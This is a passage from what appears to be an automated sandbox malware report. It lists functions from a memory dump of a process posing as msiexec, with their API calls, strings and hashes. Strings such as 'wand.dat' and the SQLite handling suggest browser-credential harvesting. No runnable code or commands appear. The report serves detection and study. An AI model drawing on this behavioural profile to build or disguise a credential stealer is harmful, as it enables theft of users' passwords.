                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004100FB
                                                                                                        • memset.MSVCRT ref: 00410112
                                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                        • String ID: </%s>
                                                                                                        • API String ID: 3400436232-259020660
                                                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                        Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040D58D
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                        • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                        • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                        Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                        • String ID: MS Sans Serif
                                                                                                        • API String ID: 210187428-168460110
                                                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                        Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                                        • String ID: edit
                                                                                                        • API String ID: 2747424523-2167791130
                                                                                                        • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                        • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                        • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                        • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                        Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                        • API String ID: 3150196962-1506664499
                                                                                                        • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                        • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                        • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                        • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                        Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 3384217055-0
                                                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                        Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                        • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                        • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                        • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                        Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                        • GetMenu.USER32(?), ref: 00410F8D
                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889144086-0
                                                                                                        • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                        • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                        • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                        • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                        Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                        • GetLastError.KERNEL32 ref: 0041810A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1661045500-0
                                                                                                        • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                        • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                        • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                        • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                        Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                        Strings
                                                                                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                        • API String ID: 1297977491-2063813899
                                                                                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                        Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040560C
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                        • String ID: *.*$dat$wand.dat
                                                                                                        • API String ID: 2618321458-1828844352
                                                                                                        • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                        • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                        Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                        • wcslen.MSVCRT ref: 00410C74
                                                                                                        • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1549203181-0
                                                                                                        • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                        • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                        Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00412057
                                                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3550944819-0
                                                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                        Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • free.MSVCRT ref: 0040F561
                                                                                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$free
                                                                                                        • String ID: g4@
                                                                                                        • API String ID: 2888793982-2133833424
                                                                                                        • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                        • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                        Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                        Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                        • memset.MSVCRT ref: 0040AF18
                                                                                                        • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865533344-0
                                                                                                        • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                        • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                        • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                        • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                        Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004144E7
                                                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                        • memset.MSVCRT ref: 0041451A
                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1127616056-0
                                                                                                        • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                        • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                        Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                        • memset.MSVCRT ref: 0042FED3
                                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: sqlite_master
                                                                                                        • API String ID: 438689982-3163232059
                                                                                                        • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                        • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                        • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                        • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                        Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                        • wcscpy.MSVCRT ref: 00414DF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3917621476-0
                                                                                                        • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                        • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                        • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                        • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                        Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
